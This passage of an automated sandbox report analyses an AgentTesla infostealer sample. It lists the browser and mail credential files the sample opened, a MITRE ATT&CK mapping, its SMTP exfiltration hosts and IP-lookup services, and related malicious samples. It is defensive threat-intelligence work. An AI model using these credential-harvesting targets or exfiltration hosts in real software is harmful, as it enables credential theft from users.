Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Nt8BLNLKN7.exe

Code function: 0_2_00405D13 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405D13

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000B.00000002.2482982085.00000000237D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2482982085.00000000237CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2482982085.00000000237A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7596, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior

Source: Yara match

File source: 0000000B.00000002.2482982085.00000000237A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000B.00000002.2482982085.00000000237D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2482982085.00000000237CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2482982085.00000000237A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7596, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Obfuscated Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	311 Process Injection	1 Software Packing	LSASS Memory	24 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	221 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	141 Virtualization/Sandbox Evasion	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	311 Process Injection	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Nt8BLNLKN7.exe	100%	Avira	TR/Injector.dmugj

Source	Detection	Scanner	Label	Link
http://smtp.santonswitchgears.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
us2.smtp.mailhostbox.com	208.91.199.223	true	true	unknown
drive.google.com	142.250.186.78	true	false	high
drive.usercontent.google.com	142.250.186.161	true	false	high
api.ipify.org	172.67.74.152	true	false	high
ip-api.com	208.95.112.1	true	false	high
smtp.santonswitchgears.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1529740848.00000000061A8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.1526945005.0000000005295000.00000004.00000800.00020000.00000000.sdmp	false		high
http://us2.smtp.mailhostbox.com	msiexec.exe, 0000000B.00000002.2482982085.00000000237CD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft	powershell.exe, 00000002.00000002.1531265885.00000000077C1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.1526945005.0000000005295000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/e	msiexec.exe, 0000000B.00000003.1740650950.0000000007D15000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2471290960.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1740569710.0000000007D15000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000002.00000002.1529740848.00000000061A8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.1529740848.00000000061A8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/Y	msiexec.exe, 0000000B.00000003.1740650950.0000000007D15000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2471290960.0000000007CFD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.1740569710.0000000007D15000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	Nt8BLNLKN7.exe, 00000000.00000000.1221286992.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Nt8BLNLKN7.exe, 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmp	false		high
https://api.ipify.org/t	msiexec.exe, 0000000B.00000002.2482982085.0000000023741000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.1526945005.0000000005295000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	msiexec.exe, 0000000B.00000003.1693054108.0000000007D15000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.ipify.org	msiexec.exe, 0000000B.00000002.2482982085.0000000023741000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	Nt8BLNLKN7.exe, Nt8BLNLKN7.exe, 00000000.00000000.1221286992.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Nt8BLNLKN7.exe, 00000000.00000002.1227841229.0000000000409000.00000004.00000001.01000000.00000003.sdmp	false		high
http://crl.micro	powershell.exe, 00000002.00000002.1531265885.00000000077C1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://smtp.santonswitchgears.com	msiexec.exe, 0000000B.00000002.2482982085.00000000237CD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.1526945005.0000000005141000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/	msiexec.exe, 0000000B.00000002.2471290960.0000000007C9A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000002.00000002.1529740848.00000000061A8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1529740848.00000000061A8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ip-api.com	msiexec.exe, 0000000B.00000002.2482982085.0000000023791000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	msiexec.exe, 0000000B.00000003.1693054108.0000000007D15000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1526945005.0000000005141000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2482982085.0000000023741000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.78	drive.google.com	United States	15169	GOOGLEUS	false
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
142.250.186.161	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
208.91.199.223	us2.smtp.mailhostbox.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	true
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1549397
Start date and time:	2024-11-05 15:55:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Nt8BLNLKN7.exe renamed because original name is a hash value
Original Sample Name:	286967221848728712fb3c332d30a149368b12e5581e61b84ed6dd55eb415b1b.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@17/11@5/5
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 95% Number of executed functions: 145 Number of non-executed functions: 43
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 7596 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6216 because it is empty
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Nt8BLNLKN7.exe

Simulations

Behavior and APIs

Time	Type	Description
09:56:02	API Interceptor	39x Sleep call for process: powershell.exe modified
11:10:53	API Interceptor	101345x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	NOuxGNqQH7.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	IPx5gzPi7I.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	copto de pago.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	RDF987656789000.cmd.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	orden de compra_.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	2q8mDVUlgI.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	iu56HJ45NV.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/?fields=225545
	SecuriteInfo.com.Trojan.DownLoader47.48553.17653.26482.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	QUOTATION#09678.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	MVPloader.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/line/?fields=hosting
208.91.199.223	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Proforma Invoice_21-1541 And Packing List.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PO.exe	Get hash	malicious	AgentTesla	Browse
	Request for Quotation Plug Valve.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Purchase Order 007823-PO# 005307.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	z9OutstandingPayment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.RATX-gen.3768.11045.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	UPDATED FLOOR PLAN_3D.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	New Order PO#86637.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	z47TTSWIFTCOPY.scr.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
us2.smtp.mailhostbox.com	copto de pago.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	Proforma Invoice_21-1541 And Packing List.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	Tax Invoice 103505.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.224
	PO.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	Purchase_Order.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
	Scanned.pdf.pif.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225
	Request for Quotation Plug Valve.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	Cotizaci#U00f3n P13000996 pdf.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
	ENQUIRY NEED QUOTATION.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225
ip-api.com	NOuxGNqQH7.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	IPx5gzPi7I.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	copto de pago.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	RDF987656789000.cmd.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	orden de compra_.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	2q8mDVUlgI.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	iu56HJ45NV.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	SecuriteInfo.com.Trojan.DownLoader47.48553.17653.26482.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	QUOTATION#09678.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	MVPloader.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
api.ipify.org	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	b9Mm2hq1pU.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	https://mlflegal.sharefile.com/public/share/web-s929b2bfc135a4aadb68ad5b8c7324a2e	Get hash	malicious	Unknown	Browse	172.67.74.152
	Ransomware Mallox.exe	Get hash	malicious	Targeted Ransomware	Browse	104.26.12.205
	COTIZACION.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	REVISED PO NO.8389.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://www.canva.com/design/DAGVlowNqco/LaGv3kp6ecOkwIXDSEYQLQ/view?utm_content=DAGVlowNqco&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	104.26.12.205
	Shipping documents.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	DB_DHL_AWB_001833022AD.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Payslip_October_2024.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TUT-ASUS	NOuxGNqQH7.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	IPx5gzPi7I.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	copto de pago.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	RDF987656789000.cmd.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	orden de compra_.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	2q8mDVUlgI.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	iu56HJ45NV.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	SecuriteInfo.com.Trojan.DownLoader47.48553.17653.26482.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	QUOTATION#09678.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	MVPloader.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
PUBLIC-DOMAIN-REGISTRYUS	p4rsJEIb7k.exe	Get hash	malicious	FormBook	Browse	119.18.54.27
	copto de pago.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	1364. 2024.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	Quote_220072.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	TT Copy.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	199.79.62.115
	24-17745.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	HSBC Payment Advice.exe	Get hash	malicious	FormBook	Browse	208.91.199.22
	H33UCslPzv.exe	Get hash	malicious	XWorm	Browse	103.53.40.62
	PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbs	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	199.79.62.19
	https://landsmith.ae/continue.html	Get hash	malicious	HTMLPhisher	Browse	103.53.42.223
CLOUDFLARENETUS	L#U043e#U0430der.exe	Get hash	malicious	LummaC	Browse	172.67.187.9
	https://www.primechoicefinance.com.au/dykjj.php?7096797967704b53693230746450797938717a5330754c4530737a736a58533837503155744a31533870547662544277413dYnJhc3dlbGxzQGhlbGVuYWluZHVzdHJpZXMuY29t	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	p4rsJEIb7k.exe	Get hash	malicious	FormBook	Browse	104.21.94.87
	https://www.imap.ne.jp/banner_click/add/20/1/?a&url=http://uniteseoul.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Fuji Xerox ENCLOSED - Revised DRAFT.pdf	Get hash	malicious	Unknown	Browse	104.17.25.14
	QzX4KXBXPq.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	VoiceOfRefugees_xls.html	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, XWorm	Browse	1.1.1.1
	5jh97SOa7H.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	fAzUnj6Djg.exe	Get hash	malicious	HawkEye, MailPassView	Browse	104.19.223.79

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://www.imap.ne.jp/banner_click/add/20/1/?a&url=http://uniteseoul.com	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	QzX4KXBXPq.exe	Get hash	malicious	LummaC	Browse	172.67.74.152
	5jh97SOa7H.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	RFQABCO004806L____________________pdf.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.74.152
	b9Mm2hq1pU.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	file.exe	Get hash	malicious	LummaC, XWorm	Browse	172.67.74.152
	Scan- 00399905 Payment slip.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	1q4pQ8ms4w.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	dZJo0ZAVUx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
37f463bf4616ecd445d4a1937da06e19	LqtjSIsoCg.exe	Get hash	malicious	GuLoader	Browse	142.250.186.78 142.250.186.161
	EQ_AW24 New Order Request.xlx.exe	Get hash	malicious	GuLoader, StormKitty, XWorm	Browse	142.250.186.78 142.250.186.161
	5jh97SOa7H.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.250.186.78 142.250.186.161
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	142.250.186.78 142.250.186.161
	ImDbHt7AA4.exe	Get hash	malicious	DarkCloud	Browse	142.250.186.78 142.250.186.161
	COTIZACION.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	142.250.186.78 142.250.186.161
	HATCH COVER REQ_AW24 New Order Request.exe	Get hash	malicious	GuLoader	Browse	142.250.186.78 142.250.186.161
	EL GINER.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.186.78 142.250.186.161
	rFactura02Presupuesto_9209Urbia_pdf_.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.186.78 142.250.186.161
	MSI18A.dll	Get hash	malicious	Unknown	Browse	142.250.186.78 142.250.186.161

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	14744
Entropy (8bit):	4.992175361088568
Encrypted:	false
SSDEEP:	384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
MD5:	A35685B2B980F4BD3C6FD278EA661412
SHA1:	59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
SHA-256:	3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
SHA-512:	70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5lbxwjb.you.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
